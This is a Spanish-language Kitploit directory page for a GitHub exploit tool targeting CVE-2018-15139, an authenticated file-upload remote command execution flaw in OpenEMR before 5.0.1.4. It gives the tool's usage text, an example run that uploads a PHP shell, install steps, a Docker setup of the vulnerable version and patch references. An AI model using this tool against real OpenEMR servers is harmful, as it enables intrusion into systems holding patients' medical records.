Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit-CVE-2018-15139 — OpenEMR < 5.0.1.4 - (Autenticado) Subida de archivos - Ejecución remota de comandos | Kitploit
Herramientas/GitHubGitHub/sec-it/exploit-cve-2018-15139
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsec-it/exploit-cve-2018-15139

exploit-CVE-2018-15139

OpenEMR < 5.0.1.4 - (Autenticado) Subida de archivos - Ejecución remota de comandos

Ver Repositorio
22hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit OpenEMR CVE-2018-15139

OpenEMR < 5.0.1.4 - (Autenticado) Subida de archivos - Ejecución remota de comandos

Exploit para CVE-2018-15139.

Uso

root@kitploit:~
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

Ejemplo

root@kitploit:~
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

Requisitos

  • httpx
  • docopt.rb

Ejemplo usando gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Despliegue Docker del software vulnerable

Advertencia: por supuesto, esta configuración no es adecuada para uso en producción.

root@kitploit:~
$ sudo docker-compose up

Los permisos de la carpeta de subida están rotos en la imagen oficial de Docker de OpenEMR, por lo que es necesario conectarse al contenedor y corregir los permisos, por ejemplo:

root@kitploit:~
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

Referencias

  • Software objetivo: OpenEMR
    • Página principal: https://www.open-emr.org/
    • Código fuente: https://github.com/openemr/openemr
    • Docker: ver docker-compose.yml
    • Versión vulnerable: < 5.0.1.4 (significa hasta 5.0.1.3)
    • Parche: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

Esta es una mejor reescritura de EDB-49998.

La vulnerabilidad fue encontrada por Project Insecurity.

Análisis del exploit y vulnerabilidad original:

  • OpenEMR parchea vulnerabilidades graves descubiertas por Project Insecurity
Descargar herramienta